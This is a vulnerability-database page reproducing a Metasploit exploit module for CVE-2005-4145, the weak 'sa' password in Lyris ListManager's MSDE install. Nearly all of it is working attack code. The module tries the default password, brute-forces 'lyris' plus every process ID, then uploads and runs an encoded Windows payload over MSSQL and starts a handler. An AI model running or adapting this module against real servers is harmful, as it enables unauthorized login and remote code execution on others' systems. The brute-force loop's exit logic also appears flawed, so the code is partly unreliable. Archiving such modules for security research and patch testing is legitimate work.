Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormH D MoorePACKETSTORM:83075
HistoryNov 26, 2009 - 12:00 a.m.

Lyris ListManager MSDE Weak sa Password

2009-11-2600:00:00
H D Moore
packetstormsecurity.com
17

0.304 Low

EPSS

Percentile

96.5%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::MSSQL  
  
def initialize(info = {})  
  
super(update_info(info,  
'Name' => 'Lyris ListManager MSDE Weak sa Password',  
'Description' => %q{  
This module exploits a weak password vulnerability in the  
Lyris ListManager MSDE install. During installation, the 'sa'  
account password is set to 'lminstall'. Once the install  
completes, it is set to 'lyris' followed by the process  
ID of the installer. This module brute forces all possible  
process IDs that would be used by the installer.  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
  
[ 'OSVDB', '21559'],  
[ 'CVE', '2005-4145']  
],  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DefaultTarget' => 0   
))  
end  
  
def exploit  
  
# New installations use a randomly generated suffix like "lyris629dAe536F"  
pass = nil  
  
while(true)  
print_status("Trying to authenticate with password 'lminstall'...")   
if(mssql_login('sa', 'lminstall'))  
pass = 'lminstall'  
break  
end  
  
print_status("Trying to authenticate with passwords 'lyris1' to 'lyris65535'...")  
1.upto(65535) do |pid|  
  
if(pid % 1000 == 0)  
print_status(" >> Completed #{pid} of 65535 authentication requests")  
end  
  
if(mssql_login('sa', "lyris#{pid}"))  
pass = "lyris#{pid}"  
break  
end   
end  
print_status("This system does not appear to be exploitable")  
return  
end   
  
print_status("")  
print_status("Sucessfully authenticated to #{rhost}:#{rport} with user 'sa' and password '#{pass}'")  
print_status("")  
  
mssql_upload_exec(Msf::Util::EXE.to_win32pe(framework,payload.encoded))  
  
handler  
disconnect  
end  
end  
`

Related

cve 1
nessus 1
cve
cve
CVE-2005-4145
2005-12-10 11:03:00
nessus
nessus
Lyris ListManager MSDE Weak sa Password
2006-01-16 00:00:00

0.304 Low

EPSS

Percentile

96.5%

JSON
Related for PACKETSTORM:83075
cve1nessus1